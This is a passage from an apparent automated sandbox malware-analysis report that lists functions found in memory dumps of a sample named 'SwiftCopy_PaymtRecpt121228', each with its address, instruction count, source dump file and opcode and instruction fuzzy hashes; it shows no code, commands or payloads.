                                                    • Opcode Fuzzy Hash: 92869b906f80b443c8375fab7607d0436586454a060cd93f0ff0b9b8d3fdf120
                                                    • Instruction Fuzzy Hash: 9C21CC75E0021A9FCB44CFADC8849AEBFF1FF89310B14816AE919E7315E7349915CBA1
                                                    Function 05A53398 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 330ef9ed76b01ce9606697ecee3f53b383c6806e42621af592fe565a78722b1f
                                                    • Instruction ID: 89450af2ebfdcbece91c32f055ff943a692c296749b618e688ec9f8e4374992e
                                                    • Opcode Fuzzy Hash: 330ef9ed76b01ce9606697ecee3f53b383c6806e42621af592fe565a78722b1f
                                                    • Instruction Fuzzy Hash: D921CC71E1021A9F8B04DFADC8448EFFBF9FF98310B10855AE519E7215E770A956CB90
                                                    Function 05A58E18 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32c0220115ec19086fede9e97dbcab8d0ea7f548183a646d8dc8e8f828213382
                                                    • Instruction ID: 1599e5c594bc006dd7970a6ca917925e24bd95df7ebc74ef891f0d57877c5e58
                                                    • Opcode Fuzzy Hash: 32c0220115ec19086fede9e97dbcab8d0ea7f548183a646d8dc8e8f828213382
                                                    • Instruction Fuzzy Hash: DC21BFB4E002098FCB04DFA9D885AEEBBF5FF88311F10816AE915A7354D734A944CBA1
                                                    Function 05A58D10 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 569e15cb89be376af6c5b5c96831760ad89c3d1e3c6407d47e4ab1e05afbd721
                                                    • Instruction ID: cf052ae55c2329f7021845d764232d0e19fb0a9b97b0c5ca8e5cb4d447621873
                                                    • Opcode Fuzzy Hash: 569e15cb89be376af6c5b5c96831760ad89c3d1e3c6407d47e4ab1e05afbd721
                                                    • Instruction Fuzzy Hash: 5311F975E0021A9FCB01DFA8D945AEEB7F5EB48320F204469D914A7344D735AE05CBA1
                                                    Function 05A52578 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f477804e4f23f3fb9e3d976e48cc156680b0945af9f90d48509fd1225f02dd99
                                                    • Instruction ID: c4c7e957cd52f4cec711e9e420d9881c692f7a79019a09f08095628f5dc2cf28
                                                    • Opcode Fuzzy Hash: f477804e4f23f3fb9e3d976e48cc156680b0945af9f90d48509fd1225f02dd99
                                                    • Instruction Fuzzy Hash: 6101E571B083144FC758EB78A81066F7EEAEFC4300F15847DD549C7384ED3489058795
                                                    Function 05A5CF0F Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4525958e974a0d5e5d28e376f4facc8012cd7a665a5cf5b83b2577dfe9f05f1b
                                                    • Instruction ID: 975ae70044744b6d8d9f79fbef6fb6a69bd8b9a4af586f23274f29d48c9f6c68
                                                    • Opcode Fuzzy Hash: 4525958e974a0d5e5d28e376f4facc8012cd7a665a5cf5b83b2577dfe9f05f1b
                                                    • Instruction Fuzzy Hash: 4A019231B043605FC7104B7A9864E6ABBAABF41670B1540BAFC99CB2A1D971CD0587E0
                                                    Function 05A52A91 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24216ea488dbd4c1c45e40d51b254430faf48ed5d31beb98449bf9574783931c
                                                    • Instruction ID: 856d67e9ba263073a7f540f69a1644c1663b0d304010077d0964776c6e693ced
                                                    • Opcode Fuzzy Hash: 24216ea488dbd4c1c45e40d51b254430faf48ed5d31beb98449bf9574783931c
                                                    • Instruction Fuzzy Hash: 19118C75B0060A9FCB11DF69C844EAE7BB5FF88620F044469EE29CB210EB30D910CBA1
                                                    Function 009DD1AF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: 924c0dc9828346671a2605444b15b594eb6a7ce5f771f070ac793a26e5a26fcf
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: D7119D75544280DFDB06CF14D5C4B15BFB1FB84314F24C6AAD9494B756C33AD84ACBA2
                                                    Function 009DD367 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: 895cf8ead66c49be041ee55f3d24235192acd2ef445978b23e63cbb6cdc51e38
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: F911BE75544240CFCB02CF14D5C4B15BF61FB84314F24C6AAD8494B7A6C33AE84ACB62
                                                    Function 05A5A140 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83bec61198ef18ede612f9f190f0fe01f68e35c665a537c2e97fe335e711221d
                                                    • Instruction ID: 5cf34857e71aa5489928eb74d4129670daca146d663d3c9a11b7007f666ab29a
                                                    • Opcode Fuzzy Hash: 83bec61198ef18ede612f9f190f0fe01f68e35c665a537c2e97fe335e711221d
                                                    • Instruction Fuzzy Hash: C11189B5E0011A9F8B44DFADC9449AEBBF5FF88310B10816AE919E7315E7309911CBA1
                                                    Function 05A5F703 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06ec862310bd530068a69cf4cf7fe88c4aa8a6bf1625cdc219c54bfa4e54f0d0
                                                    • Instruction ID: 8cc39f6c87aefe6c6089a48c20ab37129451488f15ee23c70a5861b6e6596b7a
                                                    • Opcode Fuzzy Hash: 06ec862310bd530068a69cf4cf7fe88c4aa8a6bf1625cdc219c54bfa4e54f0d0
                                                    • Instruction Fuzzy Hash: A0112971A0E3909FC7178B74986489CBF75EE8222031A84DBD495DB1A3C6398D1ACB62
                                                    Function 05A508B8 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1d3226cfd9e612db878c8afe0d95480773b16049decf01c6a0337d383649d54
                                                    • Instruction ID: 812cca5c0f61a2d4d916e636c377e78c3f371e8a458d56ce56d9633e888e93c2
                                                    • Opcode Fuzzy Hash: c1d3226cfd9e612db878c8afe0d95480773b16049decf01c6a0337d383649d54
                                                    • Instruction Fuzzy Hash: FE110C303443215BDB14A72CE4157DBB6DA9B8430CF10C82DD1868B7C6CEF65C494BE2
                                                    Function 05A58D20 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 240bb7a8f7dc20239195a2c5c69b98d506e9077f3422770de617d08001f8b78c
                                                    • Instruction ID: fcdb2b048d25934e99bda3d46a6976019d712491ed5bb7a0cd6a896dd04a2e2c
                                                    • Opcode Fuzzy Hash: 240bb7a8f7dc20239195a2c5c69b98d506e9077f3422770de617d08001f8b78c
                                                    • Instruction Fuzzy Hash: 1F11D475E0020A9FCB05DFA8D941AEEBBF5EF48320F20846AD914A7354D735AE05CBA1
                                                    Function 05A52AA0 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe338cb37f55c85e49e88c461b103fae252c31b5a817664604a00c2cf58a2b27
                                                    • Instruction ID: c5c29f46a467db7b22e5081b62d89608397197603dd2cb644374a78c200beb41
                                                    • Opcode Fuzzy Hash: fe338cb37f55c85e49e88c461b103fae252c31b5a817664604a00c2cf58a2b27
                                                    • Instruction Fuzzy Hash: 20113C75B0060A9FCB15DF69D884EAE7BF5FF48620F048429EE25D7210DB30D910CBA1
                                                    Function 05A514C9 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 810588b2dd3915855b6fdb1a7f10e8c751b029a034e0f0bd97a18f05ced82e41
                                                    • Instruction ID: fc7a58fe4f43a0d5fbee550c13fb93ada1d56c514fd1e140519d72bf483e6771
                                                    • Opcode Fuzzy Hash: 810588b2dd3915855b6fdb1a7f10e8c751b029a034e0f0bd97a18f05ced82e41
                                                    • Instruction Fuzzy Hash: E501A7327042096FDF559B54D444F7E379AEB84315F28C026EE5ECB281CA76C853D791
                                                    Function 05A508C8 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b4182a32e2154a6eeb51b8abb5f16a9a974c8f131e6dc465716acb723984f3f
                                                    • Instruction ID: e90090da5fd3c6cf63c440aa47a68fb62a246b08c5c5610c090e1c5166eed7bd
                                                    • Opcode Fuzzy Hash: 9b4182a32e2154a6eeb51b8abb5f16a9a974c8f131e6dc465716acb723984f3f
                                                    • Instruction Fuzzy Hash: D60128303003215BEB14A76CE4147DAB6CAAB84308F10C51DD18A8F7C6CEF79C498BE2
                                                    Function 05A534B8 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6885ebe5bccc5396da190360f775255afac5676ff0d164bcff1e1ec8061a38bb
                                                    • Instruction ID: d358882876d5fc8517b6a22a4a0564226a07c7ddb80886762d6be7eec65b9e27
                                                    • Opcode Fuzzy Hash: 6885ebe5bccc5396da190360f775255afac5676ff0d164bcff1e1ec8061a38bb
                                                    • Instruction Fuzzy Hash: FF017C313042109FCB19AF69D440F6A73AAFFC4361B28D87EED1A87255CB75D806C791
                                                    Function 05A534C8 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1c9c5894db42e97841f8b22a6f7bbd139d985cc488238803542170858698a02
                                                    • Instruction ID: f80612566c652cfefab98ab0daeb3d838a2cd8401202bfa1c6d4c05315711efe
                                                    • Opcode Fuzzy Hash: e1c9c5894db42e97841f8b22a6f7bbd139d985cc488238803542170858698a02
                                                    • Instruction Fuzzy Hash: 87018F303042105FCB18AB29D450E2A73AAEFC0361728D87EDD1687354CF75DC06C791
                                                    Function 009CD76D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065779234.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9cd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 684ff28fd304001ce7d7fe2866db612e86ad5be7a681160794ff65e63193f4d4
                                                    • Instruction ID: dce37dcdff00fb0325b57ddf31c092a549c528c4f40fe9f6e92201e7e457e4cd
                                                    • Opcode Fuzzy Hash: 684ff28fd304001ce7d7fe2866db612e86ad5be7a681160794ff65e63193f4d4
                                                    • Instruction Fuzzy Hash: E301A7B15063449AE7108A15DD84F67BFDCEF45324F18C47DED090A286C37D9C40C672
                                                    Function 05A59EBC Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eacac82fa52bee3f21d1cd843d5da6b015b613053d194cc311f1b2db4dacf931
                                                    • Instruction ID: b5bd3e7ffcb083ebb8dce6f761d468a14fb46fb53b6589dd8101879f373625cd
                                                    • Opcode Fuzzy Hash: eacac82fa52bee3f21d1cd843d5da6b015b613053d194cc311f1b2db4dacf931
                                                    • Instruction Fuzzy Hash: 01F06D31354529CB9A18DB3AD894E3E37EEAFC5A223054069ED17C72B0EF30DC01C6A1
                                                    Function 05A56E34 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1bec14532b1ce77f1e38cce6adf44251d18b361594c4d92a5e0dbdc5720f74b
                                                    • Instruction ID: 98616d1bbaae20f195027196358c90658c4194084824dbba178b4824518f7aa8
                                                    • Opcode Fuzzy Hash: c1bec14532b1ce77f1e38cce6adf44251d18b361594c4d92a5e0dbdc5720f74b
                                                    • Instruction Fuzzy Hash: D80129B2801219DFDB10CFA9D548BEEBAF1BF48320F558625E825AB2A0D3344A45CB91
                                                    Function 05A53431 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ac0d47eff6858909e8e1694de3fe63d73a26950d792502459b55dd533772865
                                                    • Instruction ID: f58aefa457d13bf8517268a9fad8f2581a3d3428f2cffe046aa633fd1ce5720d
                                                    • Opcode Fuzzy Hash: 1ac0d47eff6858909e8e1694de3fe63d73a26950d792502459b55dd533772865
                                                    • Instruction Fuzzy Hash: ED015A312002008FCB16DF59E454E6AB3BAFFC5265B64C87AE90A87229CB75EC06CB50
                                                    Function 05A5D291 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 591dfbb961536eb2866798824f5f7e6da6a6aa099d8f07bbdf24d845e8b042b7
                                                    • Instruction ID: 7661113046b403880841665ddc2cf53ca9a3c39e22e1711b7378b32543df9c18
                                                    • Opcode Fuzzy Hash: 591dfbb961536eb2866798824f5f7e6da6a6aa099d8f07bbdf24d845e8b042b7
                                                    • Instruction Fuzzy Hash: F401D131924B048BCB117F6DD801898BB74EF97321B01872EEDC5A7250EF31C9A4CB91
                                                    Function 05A51F47 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9e625add2fd2f0277ea0971fa58983c73c6bf0f342b28af164ab721f4579b84
                                                    • Instruction ID: 82b5022a5e14ea124e261ec088ed8790b8c0117018c6d68d792c9051a7d758a7
                                                    • Opcode Fuzzy Hash: b9e625add2fd2f0277ea0971fa58983c73c6bf0f342b28af164ab721f4579b84
                                                    • Instruction Fuzzy Hash: 19012C30A181589FDB14DB69D894EEEBBF6EF49310F14405AF851EB361C735D801CB90
                                                    Function 05A53440 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a23a99bc4db329902d2e24e5ba79185df395fb8f55133ca3de496e11bbef35c5
                                                    • Instruction ID: 2820b174771115fa41ff6ce94b15e4bed27f6cd27dcaf1c5fe213ec306310cf7
                                                    • Opcode Fuzzy Hash: a23a99bc4db329902d2e24e5ba79185df395fb8f55133ca3de496e11bbef35c5
                                                    • Instruction Fuzzy Hash: EF014B313102008FCB16EB69D554E2AB3FAEFC5261B54C87AD91A87365DB71EC02CB50
                                                    Function 05A5B950 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c42959f285f9194b5c7399451be63317536ca53a6c786af2100b892f456f6e9
                                                    • Instruction ID: df3d768ada5917110541983571e65f3d42f7c4b76ba6e209d25c31ab32bf3243
                                                    • Opcode Fuzzy Hash: 3c42959f285f9194b5c7399451be63317536ca53a6c786af2100b892f456f6e9
                                                    • Instruction Fuzzy Hash: CDF0C231319211CFCB149B358464E7D3BAA6FC592231500AAE853CB3A1DB30CC02C7A1
                                                    Function 05A5A0C9 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53c4f299fddefa0dc67dea5c015a0df01705b2c9441c6070dcebb2cf1712a29b
                                                    • Instruction ID: 7dc6270f6a8b11523068439b3c8c1ca446be3414b07ed9c6282a7251d5f27176
                                                    • Opcode Fuzzy Hash: 53c4f299fddefa0dc67dea5c015a0df01705b2c9441c6070dcebb2cf1712a29b
                                                    • Instruction Fuzzy Hash: FFF0AF31A147548FC711EF69E884CDEBFB8EF8631071042AFE5859B321D6309E09CBA2
                                                    Function 05A5EB34 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f5cc82a2432e4c18204fb0d877037b7dab3d919992252149583bb962283ce75
                                                    • Instruction ID: 7203bcb7d144d44f97f51bc628ca7069af4d4bb590a189b2cd3895d218f35a69
                                                    • Opcode Fuzzy Hash: 4f5cc82a2432e4c18204fb0d877037b7dab3d919992252149583bb962283ce75
                                                    • Instruction Fuzzy Hash: 33F0B475E01214EFCB149B75D584C6DBBB6FF8477172680E9D81997214DB319D22CF40
                                                    Function 05A51AAF Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6d269ef56be625854bdcbbee2386417c81b2ec7671ac6f8fc73468000ec7d20
                                                    • Instruction ID: 716fbd933e11c81f5f539c4f3cec67487ad7b20d53b2c5496f392afe121a39b4
                                                    • Opcode Fuzzy Hash: f6d269ef56be625854bdcbbee2386417c81b2ec7671ac6f8fc73468000ec7d20
                                                    • Instruction Fuzzy Hash: E8F0C232B083149FCB19AB75F814A6E3BAAEFC5315F04842DE44787341CE749C01CB95
                                                    Function 05A50C1C Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18169f98dfe35f455169f671ad587fab3df5fea5099a70b6f4041a0159f4fcd5
                                                    • Instruction ID: be8eca8054395b49d2d4703351d6b46e12b4dcc050685041cfe3e7fd50c44d79
                                                    • Opcode Fuzzy Hash: 18169f98dfe35f455169f671ad587fab3df5fea5099a70b6f4041a0159f4fcd5
                                                    • Instruction Fuzzy Hash: 9EF059323186600BC324461DCC48D3937AAFFDA21170D40FAE402CB762DA68CC028351
                                                    Function 05A56ED2 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b52725569c79c8816e8e13a4512e4628814911f763b808dd24d93eaec46cd91c
                                                    • Instruction ID: 5c59e0a6e3ecd5375902b374d7b2032d8a93ec96c433c50d8328571724a82f0b
                                                    • Opcode Fuzzy Hash: b52725569c79c8816e8e13a4512e4628814911f763b808dd24d93eaec46cd91c
                                                    • Instruction Fuzzy Hash: 30F082727002256FD3149A5ADC95EABBBEDEBC86607558079F508C7351DA31DC0182E4
                                                    Function 05A50E78 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7549e5794bdee78a05b4bbfcfad9336997b5c64e609d4d05d8f97becbb314dce
                                                    • Instruction ID: 9c02f61d3782fc215d10d43f29b944e5a7f23f7fc8aed4b62978d52bade10071
                                                    • Opcode Fuzzy Hash: 7549e5794bdee78a05b4bbfcfad9336997b5c64e609d4d05d8f97becbb314dce
                                                    • Instruction Fuzzy Hash: 09F0377295021A8FDB50EF6CCD42BACBBB1EF44311F0489B6D418D7256E638D64A8B81
                                                    Function 009CD76C Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
